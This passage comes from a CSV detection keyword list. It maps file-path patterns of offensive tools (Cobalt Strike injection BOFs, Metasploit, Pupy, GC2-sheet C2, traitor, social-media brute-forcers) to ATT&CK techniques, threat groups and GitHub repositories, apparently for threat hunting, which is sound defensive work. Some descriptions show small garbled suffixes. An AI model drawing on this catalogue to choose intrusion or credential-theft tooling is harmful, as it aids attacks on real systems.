T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ntcreatethread*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ntcreatethread/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ntqueueapcthread*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/setthreadcontext*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/svcctrl/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/tooltip/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/uxsubclassinfo*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injections/SQL.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/injectsu.exp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/injectsu.lib*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/injectsu.pdb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/injectsu/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/inline_syscall.git*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/inline_syscall/include/in_memory_init.hpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/inline-exec/*.exe","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/InlineWhispers*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" +"*/insta-bf.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" +"*/instabf.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" +"*/instabrute.py*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*/instainsane.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z" +"*/instainsane.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z" +"*/install_elevated.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/install-sb.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*/insTof.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" +"*/interactive_shell.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/interactsh/*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C5","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*/interactsh-client*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C6","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*/interactsh-collaborator*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C15","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*/interactsh-server*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C8","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*/internal/C2/*.go*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" +"*/internal/pipe/pipe.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/Internals/Coff.cs*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*/Inveigh.git*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*/Inveigh.txt*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/Invoke-Bof/*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" +"*/Invoke-HostEnum.ps1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to 